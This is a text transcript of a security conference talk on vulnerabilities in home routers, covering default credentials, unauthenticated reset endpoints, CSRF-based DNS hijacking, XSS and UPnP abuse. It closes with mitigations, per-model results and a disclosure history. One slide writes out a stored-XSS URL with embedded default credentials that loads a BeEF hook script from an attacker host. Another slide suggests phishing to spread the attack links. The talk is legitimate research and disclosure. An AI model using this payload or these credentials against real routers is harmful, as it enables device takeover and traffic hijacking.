destroying router security - nnc5ed
TRANSCRIPT
![Page 1: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/1.jpg)
![Page 2: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/2.jpg)
About us...
Destroying Router Security · NNC5ed 2
Meet our research group Álvaro Folgado
Rueda Independent Researcher
José Antonio
Rodríguez García Independent Researcher
Iván Sanz de Castro Security Analyst at
Wise Security Global.
![Page 3: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/3.jpg)
Main goals
Destroying Router Security · NNC5ed 3
Search for vulnerability issues
Explore innovative attack vectors
Develop exploiting tools
Build an audit methodology
Evaluate the current security level of routers
![Page 4: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/4.jpg)
State of the art • Previous researches
Destroying Router Security · NNC5ed 4
![Page 5: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/5.jpg)
State of the art • Previous researches
Destroying Router Security · NNC5ed 4
![Page 6: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/6.jpg)
State of the art • Previous researches
Destroying Router Security · NNC5ed 4
![Page 7: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/7.jpg)
State of the art • Previous researches
Destroying Router Security · NNC5ed 4
![Page 8: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/8.jpg)
State of the art • Previous researches
Destroying Router Security · NNC5ed 4
![Page 9: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/9.jpg)
State of the art • Previous researches
Destroying Router Security · NNC5ed 4
![Page 10: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/10.jpg)
State of the art • Real world attacks - Example 1
Destroying Router Security · NNC5ed 5
![Page 11: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/11.jpg)
State of the art • Real world attacks - Example 2
Destroying Router Security · NNC5ed 6
![Page 12: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/12.jpg)
Common security problems • Services
• Too many. Mostly useless. • Increases attack surfaces
• Insecure
Destroying Router Security · NNC5ed 7
![Page 13: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/13.jpg)
Common security problems • Default credentials
• Public and well-known for each model
• Non randomly generated
Destroying Router Security · NNC5ed 8
45%
27%
5%
5%
18% User / Password
1234 / 1234
admin / admin
[blank] / admin
admin / password
vodafone / vodafone
![Page 14: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/14.jpg)
Common security problems • Default credentials
• Hardly ever modified by users
Destroying Router Security · NNC5ed 9
“I don't remember what the password is. I have never changed it.”
* Gives you a post-it with the Wi-Fi password *
“Administrative password of... WHAT?”
“Oh!, so we have one of those (routers)?”
Users' response when asked about router passwords
Be
st-c
ase
sc
en
ario
W
ors
t-ca
se
sce
nar
io
![Page 15: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/15.jpg)
Common security problems • Multiple user accounts
• Also with public default credentials
• Mostly useless for users
• Almost always hidden for end-users • Passwords for these accounts are never changed
Destroying Router Security · NNC5ed 10
![Page 16: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/16.jpg)
Common security problems • Multiple user accounts
• Also with public default credentials
• Mostly useless for users
• Almost always hidden for end-users • Passwords for these accounts are never changed
Destroying Router Security · NNC5ed 10
![Page 17: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/17.jpg)
Bypass Authentication • Allows unauthenticated attackers to carry out
router configuration changes
• Locally and remotely
• Exploits: • Improper file permissions
• Service misconfiguration
Destroying Router Security · NNC5ed 11
![Page 18: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/18.jpg)
Bypass Authentication • Web configuration interface
• Permanent Denial of Service • By accessing /rebootinfo.cgi
• Reset to default configuration settings • By accessing /restoreinfo.cgi
• Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized) • But spamming gets the job done!
Destroying Router Security · NNC5ed 12
Video Demo #1 • Persistent DoS / Restore router to default
settings without requiring authentication
![Page 19: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/19.jpg)
Bypass Authentication • SMB
• Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd
• File modification is as well possible
• Erroneous configuration of the wide links feature
Destroying Router Security · NNC5ed 13
![Page 20: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/20.jpg)
Bypass Authentication • SMB
• Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd
• File modification is as well possible
• Erroneous configuration of the wide links feature
Destroying Router Security · NNC5ed 13
![Page 21: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/21.jpg)
Bypass Authentication • Twonky Media Server
• Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files.
• Misconfiguration of the service
Destroying Router Security · NNC5ed 14
![Page 22: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/22.jpg)
Bypass Authentication • Twonky Media Server
• Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files.
• Misconfiguration of the service
Destroying Router Security · NNC5ed 14
![Page 23: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/23.jpg)
Cross Site Request Forgery • Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal • DNS Hijacking
• Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed 15
![Page 24: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/24.jpg)
Cross Site Request Forgery • Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal • DNS Hijacking
• Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed 15
![Page 25: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/25.jpg)
Cross Site Request Forgery • Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal • DNS Hijacking
• Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed 15
![Page 26: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/26.jpg)
Cross Site Request Forgery • Change any router configuration settings by
sending a specific malicious link to the victim
• Main goal • DNS Hijacking
• Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed
• Google Chrome does not pop-up warning message
Destroying Router Security · NNC5ed 15
![Page 27: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/27.jpg)
Cross Site Request Forgery • Suspicious link, isn't it?
• URL Shortening Services
• Create a malicious website
Destroying Router Security · NNC5ed 16
![Page 28: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/28.jpg)
Persistent Cross Site Scripting • Inject malicious script code within the web
configuration interface
• Goals • Session Hijacking
• Browser Infection
Destroying Router Security · NNC5ed 17
![Page 29: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/29.jpg)
Persistent Cross Site Scripting • Inject malicious script code within the web
configuration interface
• Goals • Session Hijacking
• Browser Infection
Destroying Router Security · NNC5ed 17
![Page 30: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/30.jpg)
Persistent Cross Site Scripting • Browser Exploitation Framework is a great help
• Input field character length limitation
• BeEF hooks link to a more complex script file hosted by the attacker
http://1234:[email protected]/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>
Destroying Router Security · NNC5ed 18
![Page 31: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/31.jpg)
Persistent Cross Site Scripting • Browser Exploitation Framework is a great help
• Input field character length limitation
• BeEF hooks link to a more complex script file hosted by the attacker
http://1234:[email protected]/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>
Destroying Router Security · NNC5ed 18
![Page 32: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/32.jpg)
Unauthenticated Cross Site Scripting • Script code injection is performed locally without
requiring any login process
• Send a DHCP Request PDU containing the malicious script within the hostname parameter
• The malicious script is injected within Connected Clients (DHCP Leases) table
Destroying Router Security · NNC5ed 19
![Page 33: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/33.jpg)
Unauthenticated Cross Site Scripting
Destroying Router Security · NNC5ed 20
![Page 34: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/34.jpg)
Unauthenticated Cross Site Scripting
Destroying Router Security · NNC5ed 20
![Page 35: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/35.jpg)
Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder...
Destroying Router Security · NNC5ed 21
![Page 36: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/36.jpg)
Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder...
Destroying Router Security · NNC5ed 21
![Page 37: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/37.jpg)
Unauthenticated Cross Site Scripting • Or even next level...
• But it works!
Destroying Router Security · NNC5ed 22
![Page 38: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/38.jpg)
Privilege Escalation • User without administrator rights is able to escalate
privileges and become an administrator
• Shows why multiple user accounts are unsafe
Destroying Router Security · NNC5ed 23
Video Demo #2
• Privilege Escalation via FTP
![Page 39: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/39.jpg)
Backdoor • Hidden administrator accounts
• Completely invisible to end users • But allows attackers to change any configuration setting
Destroying Router Security · NNC5ed 24
![Page 40: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/40.jpg)
Backdoor • Hidden administrator accounts
• Completely invisible to end users • But allows attackers to change any configuration setting
Destroying Router Security · NNC5ed 24
![Page 41: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/41.jpg)
Information Disclosure • Obtain critical information without requiring any
login process • WLAN password
• Detailed list of currently connected clients
• Hints about router's administrative password
• Other critical configuration settings
Destroying Router Security · NNC5ed 25
![Page 42: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/42.jpg)
Information Disclosure • Obtain critical information without requiring any
login process • WLAN password
• Detailed list of currently connected clients
• Hints about router's administrative password
• Other critical configuration settings
Destroying Router Security · NNC5ed 25
![Page 43: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/43.jpg)
Information Disclosure
Destroying Router Security · NNC5ed 26
![Page 44: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/44.jpg)
Information Disclosure
Destroying Router Security · NNC5ed 26
![Page 45: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/45.jpg)
Information Disclosure
Destroying Router Security · NNC5ed 26
![Page 46: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/46.jpg)
Universal Plug and Play • Enabled by default on several router models
• Allows application to execute network configuration changes such as opening ports
• Extremely insecure protocol • Lack of an authentication process
• Awful implementations
• Goals • Open critical ports for remote WAN hosts
• Persistent Denial of Service
• Carry out other configuration changes
Destroying Router Security · NNC5ed 27
![Page 47: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/47.jpg)
Universal Plug and Play • Locally
• Miranda UPnP tool
Destroying Router Security · NNC5ed 28
![Page 48: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/48.jpg)
Universal Plug and Play • Locally
• Miranda UPnP tool
Destroying Router Security · NNC5ed 28
![Page 49: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/49.jpg)
Universal Plug and Play • Locally
• Miranda UPnP tool
Destroying Router Security · NNC5ed 28
![Page 50: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/50.jpg)
Universal Plug and Play
Destroying Router Security · NNC5ed 29
![Page 51: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/51.jpg)
Universal Plug and Play
Destroying Router Security · NNC5ed 29
![Page 52: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/52.jpg)
Universal Plug and Play
Destroying Router Security · NNC5ed 29
![Page 53: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/53.jpg)
Universal Plug and Play
Destroying Router Security · NNC5ed 29
![Page 54: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/54.jpg)
Universal Plug and Play • Remotely
• Malicious SWF file
Destroying Router Security · NNC5ed 30
![Page 55: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/55.jpg)
Attack vectors • Locally
• Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly
• Remotely • The attacker is outside of the victim's LAN
Destroying Router Security · NNC5ed 31
![Page 56: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/56.jpg)
Social Engineering is your friend • For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed 32
![Page 57: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/57.jpg)
Social Engineering is your friend • For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed 32
![Page 58: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/58.jpg)
Social Engineering is your friend • For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed 32
![Page 59: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/59.jpg)
Social Engineering is your friend • For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Destroying Router Security · NNC5ed 32
![Page 60: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/60.jpg)
Destroying Router Security · NNC5ed 33
Live Demo #1
• DNS Hijacking via CSRF
Live Demo #2
• Bypass Authentication using SMB Symlinks
• Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #3
![Page 61: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/61.jpg)
Developed tools
Destroying Router Security · NNC5ed 34
![Page 62: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/62.jpg)
Developed tools
Destroying Router Security · NNC5ed 35
![Page 63: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/63.jpg)
7
3
1
No reply
"Not our problem"
Other
Manufacturers' response • Average 2-3 emails sent to each manufacturer
• Most of them unreplied... 6 months later
• Number of vulnerabilities fixed: 0
Destroying Router Security · NNC5ed 36
![Page 64: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/64.jpg)
Manufacturers' response • Average 2-3 emails sent to each manufacturer
• Most of them unreplied... 6 months later
• Number of vulnerabilities fixed: 0
Destroying Router Security · NNC5ed 36
![Page 65: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/65.jpg)
Mitigations • For end users
• Change your router's administrative password
• Try to delete any other administrative account • At least, change their passwords
• Update the firmware... • ... after spamming your manufacturer to fix the
vulnerabilities
• Do not trust shortened links
• Disable UPnP. It's evil
• Disable any other unused services
Destroying Router Security · NNC5ed 37
![Page 66: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/66.jpg)
Mitigations • For manufacturers
• Listen to what security researchers have to say
• Do not include useless services • Specially for ISP SOHO routers
• At least, make it feasible to completely shut them down
• Critical ports closed to WAN by default • At least: 21, 22, 23, 80 and 8000/8080
• Randomly generate user credentials
• Do not include multiple user accounts
• Avoid using unsafe protocols (HTTP, telnet and FTP)
• Design a safer alternative to UPnP
Destroying Router Security · NNC5ed 38
![Page 67: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/67.jpg)
Mitigations • For manufacturers
• XSS • Check every input field within router's web interface
• Sanitize DHCP hostname parameters
• Content Security Policies
• CSRF • Tokens... that work
• Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages
• Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB)
Destroying Router Security · NNC5ed 39
![Page 68: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/68.jpg)
Mitigations • For manufacturers
• XSS • Check every input field within router's web interface
• Sanitize DHCP hostname parameters
• Content Security Policies
• CSRF • Tokens... that work
• Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages
• Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB)
Destroying Router Security · NNC5ed 39
![Page 69: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/69.jpg)
Results • More than 60 vulnerabilities have been discovered
• 22 router models affected
• 11 manufacturers affected
Destroying Router Security · NNC5ed 40
![Page 70: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/70.jpg)
Destroying Router Security · NNC5ed 41
0
2
4
6
8
10
12
14
16
18
Disclosed vulnerabilities per manufacturer
Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilities Number of affected routers
![Page 71: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/71.jpg)
Destroying Router Security · NNC5ed 42
21%
15%
20% 8%
2%
3%
2%
6%
23% XSS
Unauthenticated XSS
CSRF
Denial of Service
Privilege Escalation
Information Disclosure
Backdoor
Bypass Authentication
UPnP
Vulnerabilities by types
![Page 72: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/72.jpg)
Destroying Router Security · NNC5ed 43
Router XSS Unauth.
XSS CSRF DoS
Privilege
Escalation
Info.
Disclosure Backdoor
Bypass
Auth. UPnP
Observa Telecom AW4062 Vuln. - Vuln. Vuln. Vuln. - - - -
Comtrend WAP-5813n Vuln. - Vuln. - - - - - Vuln.
Comtrend CT-5365 Vuln. Vuln. Vuln. - - - - - Vuln.
D-Link DSL2750B - - - - - Vuln. - - Vuln.
Belkin F5D7632-4 - - Vuln. Vuln. - - - - Vuln.
Sagem LiveBox Pro 2 SP Vuln. - - - - - - - Vuln.
Amper Xavi 7968/+ - Vuln. - - - - - - Vuln.
Sagem F@st 1201 - Vuln. - - - - - - -
Linksys WRT54GL - Vuln. - - - - - - -
Observa Telecom RTA01N Vuln. Vuln. Vuln. Vuln. - - Vuln. - Vuln.
Observa Telecom BHS-RTA - - - - - Vuln. - - Vuln.
Observa Telecom VH4032N Vuln. - Vuln. - - - - Vuln. Vuln.
Huawei HG553 Vuln. - Vuln. Vuln. - - - Vuln. Vuln.
Huawei HG556a Vuln. Vuln. Vuln. Vuln. - - - Vuln. Vuln.
Astoria ARV7510 - - Vuln. - - - - Vuln. -
Amper ASL-26555 Vuln. Vuln. Vuln. - - - - Vuln.
Comtrend AR-5387un Vuln. Vuln. - - - - - - -
Netgear CG3100D Vuln. - Vuln. - - - - - -
Comtrend VG-8050 Vuln. Vuln. - - - - - - -
Zyxel P 660HW-B1A Vuln. - Vuln. - - - - - -
Comtrend 536+ - - - - - - - - Vuln.
D-Link DIR-600 - - - - - - - - Vuln.
![Page 73: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/73.jpg)
Responsible Disclosure
Destroying Router Security · NNC5ed 44
![Page 74: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/74.jpg)
Responsible Disclosure
Destroying Router Security · NNC5ed 44
![Page 75: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/75.jpg)
Responsible Disclosure
Destroying Router Security · NNC5ed 44
![Page 76: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/76.jpg)
Responsible Disclosure
Destroying Router Security · NNC5ed 44
![Page 77: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/77.jpg)
Responsible Disclosure
Destroying Router Security · NNC5ed 44
![Page 78: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/78.jpg)
Responsible Disclosure
Destroying Router Security · NNC5ed 44
![Page 79: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/79.jpg)
Conclusion • Has SOHO router security
improved? • Hell NO!
• Serious security problems
• Easy to exploit
• With huge impact
• Millions of users affected
• PLEASE, START FIXING SOHO ROUTER SECURITY
• NOW!
Destroying Router Security · NNC5ed 45
![Page 80: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/80.jpg)
TL;DR
Destroying Router Security · NNC5ed 46
![Page 81: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/81.jpg)
TL;DR
Destroying Router Security · NNC5ed 46
![Page 82: Destroying Router Security - NNC5ed](https://reader034.vdocuments.us/reader034/viewer/2022052117/5a6ddaa77f8b9aab3a8b5241/html5/thumbnails/82.jpg)
Álvaro Folgado Rueda · [email protected]
José A. Rodríguez García · [email protected]
Iván Sanz de Castro · [email protected]
Destroying Router Security · NNC5ed 47
Thank you! Q&A Time